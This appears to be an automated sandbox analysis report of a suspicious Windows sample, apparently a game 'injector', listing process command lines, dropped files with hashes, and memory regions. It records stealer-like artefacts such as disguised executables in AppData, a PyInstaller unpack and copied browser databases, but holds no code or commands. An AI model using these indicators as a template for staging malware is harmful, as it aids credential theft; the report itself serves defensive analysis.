"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Files

SHA1 fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256 e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA512 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13357011505904057

MD5 9a1cc409b6ef8c15f78caa8fb564742d
SHA1 f006f75b14da84382e250584f036d6b7b0d4d766
SHA256 5cbe754e2209aeac04a77e367981e547cfc32e49428b2b588499d2449d0877ed
SHA512 ed65fe1900d9107490019b947d32bbfd187da3576e66822c5f71362eba7ea6d2f4ad0098ed8631ee245b2736183e5f92f2fea456bd1977389d743bfd13a4c473

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

MD5 9927fa5ce3f0517f5bdec824130a434a
SHA1 2d42d0aa78f433b6b3c1134e4781925a65175498
SHA256 d309ccd2ff7883ec6c7873947dfd9ed900ddf8b4cbd78b5328a7ed81aee44ffa
SHA512 aa1d7da57eca64a482533529b12bd9d901eb0447dd5d22450612d822e3d703481e1629fe30f67ba324056b5dba2f2da26577c8538b719a934ba65eeb9c7fd80a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

MD5 ba92e5bbca79ea378c3376187ae43eae
SHA1 f0947098577f6d0fe07422acbe3d71510289e2fc
SHA256 ccf4c13cd2433fe8a7add616c7d8e6b384cf441e4d948de5c6fc73e9315c619f
SHA512 aa1d8b7eb9add6c5ed5635295f501f950914affc3fa9aa1ee58167ed110f99a1760b05e4efb779df8e432eab1b2a0fc9cf9d67a05b2d5432ff8f82c620a38a62

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

MD5 be1eb628acf34e97f4533dad64ffa2fb
SHA1 39f9135d32b1533e566e3713d5988e4a8d318ebb
SHA256 b9cb7b4e8b60ef2d17d405d4c28eae116491c54a300c7c2eff41ee951f9ad496
SHA512 33ede826d333ce01cac7a87c177ea4752bd5ec9f2826fe27b380383781fdfc52fe1bff7ae5cf7741500114338d0623326173b94b9bc7f2a83aed0ea093b75c7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

MD5 cf934811d13766a9223b08f43e045782
SHA1 710ae48150efb574d0614abf54e1d06acda5d81b
SHA256 d0b23ecf4378d3594d1e2d9261d42a9deccd79779dcede3d58e5d014715023c8
SHA512 41a3b1a71e7b2ff35e0ca663db1279edf0f56b215d5d8e8b320539b8c9b9b53e06981741b662857172db619801cb81ee516335a44897abf4a4df6a9efc7bc0ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

MD5 e2d22a1eb3920b6e344aa0d3542d9905
SHA1 520f99fc83cdc576330ac8c4cf711af9e228276b
SHA256 f2c18da53cc6fc8fcb3100135184d2a702a7b009cc6decda8d3de41f68a8c3e7
SHA512 c749f476664662e6ba41d00a125b93e8cf755c920fb2ce28d22d01beca24d3c1678d1bd42a958206784ad13c13a41e97527dfc0d53fbf54f0b1dd7130dbb4eed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

MD5 8ffcc8e60ffbb1e3c0338918820402e4
SHA1 1c9f545e1174ec107ef10731bc3db90ca76e61dd
SHA256 c70e48916720e103ccca4e8f532ffec38c2b860ab47be4f272aa0378da09c8f7
SHA512 8885152591ce3d0f54acad8600e199dda56da72e9a8b46d3302d3889fe6889ccfc4ff0f4bb2c4769857e3d09c3c485e3227ace8aa2d1b394ee291cfed5f6861a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 43076cf1e2e34e9d6efc2b176831a2a9
SHA1 fdf0f8e37c4e5ba28fd55e5caf94412d4c289b22
SHA256 e25148ab882675222ee2fc74163b611c5ec112e7f538c9c002bf8af1a76adcaf
SHA512 ec322fe93277aeeeff5a4801a0321e80f00e996e90357903d647ea26d72721fd2c17075f4caa78767a2f4770689a6774b3da2fcf7a620ac2cc25b2e1a6ba8417

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

MD5 bb45a89131c05d7f9303c6da5796d3ba
SHA1 581963e46b0629665bfbeb082878f89775a9194d
SHA256 562a23468ebbbb83c7af740257ce43819248593a4d34b5ad60938b91043bcbd5
SHA512 61e51b3c3178d061ff6825d57b9421cdfcc62c6b2b74f42d499dcb1122ab6a9ae6aa296a69906cd999ce4e65832fe0ca4cd4756b41996d7de38b60022ced4c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

MD5 6a358000e540484505ef1be10de0614d
SHA1 e2428435ae397ab9334ece4fcc9efc73f694f55a
SHA256 318ac07b9305c2092d2b825a748b810f327267c12b3b7c739796201651f070f1
SHA512 344e322a3ab28374794f13883fbcb593321e4c087f495d9e1e51344b18eb97f1885414461129d3e45618e4db26b54b90b8ad1a051dfe562158cf463363cb3889

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

MD5 c04bcb82a84e38916665757851fc49cc
SHA1 196ff9cb450ec193e3be364fe44d7149205f0b93
SHA256 11eec99a6ac4fd78417bd804e81a629a55929ea4c45a2947c8234d1df8158579
SHA512 001f7353e33b02a59e5320a0a288e8ec632eb7b9de8290c19e82c3c9dee313c03474b4dfa70f3ec0f11cf28fa143e32877f72159fe5a7701e3aa01a3ef4c2e1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

MD5 26d663b1b0d0e22ed9eac024323c5aec
SHA1 32f1ba6aabd90be6ad89ee7d9ae029742569ccb8
SHA256 c1f49c4ee65365d6e8c20c7243fec520081334d7eb5ebfaf0736bb1b333e08c2
SHA512 08d2a9d271c14456c7fe8fa0b8d14b93faffc92f8d348dbe13edbfcaa0becaf5035aa58b583daaa23ef29a931ac6dd0a821f0010850fd9b747c3bdcc6436acc5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 b54e6a8428f252fee8815d9d8e991a92
SHA1 798938bf88f5e4f5d3eecdc2cf49487b5efb8f17
SHA256 f746e647518bbdc085e252d91f5da35d73d560259cf23867df4172c6c49147f9
SHA512 9ec47eb25a144d89c6cb6523008932e4e051a60b93a48279b7a6515015b600610c184d8443910d6ab7b98440c2cbdfa4fc0e737a84acbb77ce36fad0ab630b09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

MD5 8af64a090194ed847c44dc10367e4b8e
SHA1 ec36047ff549a66218a18ce68044defd245c1b01
SHA256 97df3d7079dc4312f4284ed9903ac1eff372956e2fb4aa0a284ac3de3120878c
SHA512 c5ab60c4b09cb3f894b93c00269747e45c1a67b0c8dcc859e1bcfe67f31a54ba062cddc0bc18c882761cce9a3ea795ba2c68aaa827ddb5938280f4498d33037c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

MD5 7bcc499ce01bf0bbc40d2b953c58516e
SHA1 9a01c3fcf973069f988f6fd5e3e6d8cceeecaa10
SHA256 0549365a43492f7128b7b61792866e16c73db40c440505dfd12c80964d78b09c
SHA512 0df5dd63d5eda8bea05bc593cfe1e4b391b2a26f8ca7b903df31f6bcb093f1059f7cc9850424c7c3d84134a56861b05a967f1638f766f79b29b233ed8e68a258

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13357011505528057

MD5 8606d733bb6862237e5a76bc267f940e
SHA1 f4ca76a96390593e8dcc66c8d41fe51d4cc86416
SHA256 82b2e4296a139986d6ea36905e0fd530aec41d2a234ef6ca25f8ff1b507ad7e1
SHA512 04dd34dbed845cae57319f9883aa5f490d98855e830573fc333cbdae70bea58f99d93ac9dee7218002c9a1392721cdd1ab0b7f3ca21d137974f812b8a561ec0a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 87beb8369e3b2688e87453e6a2e9a56b
SHA1 285daf7e6cbe3617e65e2244f8a5880151f09dc1
SHA256 b6e092635b42c08b4174115b288fb0294ad8b4d74a402a337bda341114f8aa4b
SHA512 a9eda1a89b1d57b0c1eaca8380abfa0b89f0e31829d979d7309f0257e3185fa82a4145258ec23de0f757457d6cdc3fefb5df100f7ceffecfa72d3a846d56d856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 db243a72b2e246857b9f68d2d752f9f1
SHA1 b24676fbb26672f15934be116b69a8c53922c107
SHA256 34c0483e5e80f24f7074880b970354bf2139d934311f0e8e0291615dbb0cfce2
SHA512 72f42bd9e1fd902cc4ee9783adcdee062b97276b779c91269bc60f7dd0bbf911a588de5f33c1ad5f17e59b7f97e2f04bed7a85f3d554bb574e176307adaa5068

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

MD5 c0af0b03765b4a03458743d620c8491b
SHA1 cc1e9b5cf85d1dbe9449740a3418f2ce05c8728d
SHA256 3bc292a46146d43be789e78b8db6ba816b41dd3c784a737cd98cc2b3dfcf2234
SHA512 443ee527d2572e39aff0382026f4b638fdd4635d4e28531d84efa552d034434b5be5c5ce9528240087d5403649d5a883fa6d577b53b66c0f6c2b180385b1573d

C:\Users\Admin\Desktop\rage free\Injector.exe

MD5 af1600933561571a811579e73ef2a78f
SHA1 89dbc08104c92fa2d296d2dcdd0cb2152c5ebf4a
SHA256 7ffea64e10fe0b27f31a2e97e3ec8eaf88a3468d282a53ab1d46ee0f868a9709
SHA512 1160ec22d94171837c25ce1f00f6c31cca3725c3a8564cab5278d28f184b7872226a6abb1c24e28ddec0345a79efdef8a4fcfa28d7f7db2cca1d6234bb8927d7

memory/836-239-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/836-240-0x0000000000800000-0x00000000018A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\injector.exe

MD5 15fa4864c56c1bc724f1098aba8f08fb
SHA1 faad863bfde036ac3ea9c65090fcdf8716d8147c
SHA256 3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993
SHA512 75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465

C:\Users\Admin\AppData\Roaming\creal.exe

MD5 43a1e4b885c35fa760c6669c670165b2
SHA1 1deea5bd35d69d98c5ff7ac2424004d2ae0e080b
SHA256 951600adde3d082e2fd9d832d1861c752ad7b3735ecbff956f7029f019572dba
SHA512 5b4b8066e1380c02a92ec5cc7387af6cd6ea169deae6462ed649113daf633c33aded3bb2b41999eeeacd5a6b820c1000065406736b4b6610275517fe0835d201

C:\Users\Admin\AppData\Roaming\Nothere.exe

MD5 20e7e9c5171c2990ffeed3ae319d1d9b
SHA1 efb8fc011d96166707442eadc9b757dad780d33c
SHA256 3385b4692ff4096c8b13c72105819f29f6f6664b3437614995339da93da317ba
SHA512 2f1a206de64d52faab38ea678ddbf2c3a9e3c04f24c974e30b44a693d780184606461ddc4a9ee998c4d41582f7c5202151d872c520c32bc1496e8b8c05c22481

memory/60-332-0x0000000000F80000-0x0000000000F9C000-memory.dmp

memory/60-330-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/836-329-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28962\python312.dll

MD5 5c5602cda7ab8418420f223366fff5db
SHA1 52f81ee0aef9b6906f7751fd2bbd4953e3f3b798
SHA256 e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce
SHA512 51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f

C:\Users\Admin\AppData\Local\Temp\_MEI28962\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\_MEI28962\base_library.zip

MD5 3909f1a45b16c6c6ef797032de7e3b61
SHA1 5a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8
SHA256 56cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44
SHA512 647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148

C:\Users\Admin\AppData\Local\Temp\_MEI28962\_ctypes.pyd

MD5 10fdcf63d1c3c3b7e5861fbb04d64557
SHA1 1aa153efec4f583643046618b60e495b6e03b3d7
SHA256 bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3
SHA512 dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f

C:\Users\Admin\AppData\Local\Temp\_MEI28962\python3.DLL

MD5 77896345d4e1c406eeff011f7a920873
SHA1 ee8cdd531418cfd05c1a6792382d895ac347216f
SHA256 1e9224ba7190b6301ef47befa8e383d0c55700255d04a36f7dac88ea9573f2fb
SHA512 3e98b1b605d70244b42a13a219f9e124944da199a88ad4302308c801685b0c45a037a76ded319d08dbf55639591404665befe2091f0f4206a9472fee58d55c22

C:\Users\Admin\AppData\Local\Temp\_MEI28962\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI28962\_bz2.pyd

MD5 c7ce973f261f698e3db148ccad057c96
SHA1 59809fd48e8597a73211c5df64c7292c5d120a10
SHA256 02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde
SHA512 a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1

C:\Users\Admin\AppData\Local\Temp\_MEI28962\_lzma.pyd

MD5 4e2239ece266230ecb231b306adde070
SHA1 e807a078b71c660db10a27315e761872ffd01443
SHA256 34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be
SHA512 86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401

C:\Users\Admin\AppData\Local\Temp\_MEI28962\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

memory/60-370-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trc1ly3f.flw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3288-380-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3288-381-0x00000159241D0000-0x00000159241E0000-memory.dmp

memory/3288-382-0x00000159241D0000-0x00000159241E0000-memory.dmp

memory/3288-383-0x000001590BD30000-0x000001590BD52000-memory.dmp

memory/3288-387-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4688-388-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4688-389-0x000001EB6A150000-0x000001EB6A160000-memory.dmp

memory/4688-390-0x000001EB6A150000-0x000001EB6A160000-memory.dmp

C:\Windows\SoftwareDistribution\Download\qOTtu.exe

MD5 9886a738e05f8a8fe04e9d0c81cc0909
SHA1 f659c6a123eb11f6f34f618265dbd54a9aa7f5e3
SHA256 abf99bd1d851c4c7015b999e81fb080e7e1147973e6a3a77c8ba7895cc8abbb6
SHA512 0d3b9e9a1a38efe1e963b929a33a8a13d4636d8056ab04fce958333db983b9fb401946c9b6990d18e9c2e2d4c2dbd2fb6aae5385e4234a5d86ef8adb98d56a21

memory/4688-433-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4128-434-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4128-435-0x000001F16C610000-0x000001F16C620000-memory.dmp

memory/4128-441-0x000001F16C610000-0x000001F16C620000-memory.dmp

memory/4128-447-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/1508-457-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/1508-458-0x000001F037C60000-0x000001F037C70000-memory.dmp

memory/1508-459-0x000001F037C60000-0x000001F037C70000-memory.dmp

memory/1508-461-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/60-466-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/60-502-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

memory/2716-505-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3592-506-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/2716-519-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3592-579-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/2888-590-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcrfcuvejrx.db

MD5 17a7df30f13c3da857d658cacd4d32b5
SHA1 a7263013b088e677410d35f4cc4df02514cb898c
SHA256 c44cbdf2dbfb3ea10d471fa39c9b63e6e2fc00f1add109d51419b208a426f4d0
SHA512 ea96cc3e2a44d2adeca4ecb4b8875a808ef041a6a5b4ae77b6bfd1600dd31f449b51b1a5997064c43e5111861ac4e3bc40a55db6a39d6323c0b00ff26d113b72

C:\Users\Admin\AppData\Local\Tempcrwncvufjj.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/2888-637-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bdb31304-4d90-4426-824c-486dfad97b24.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

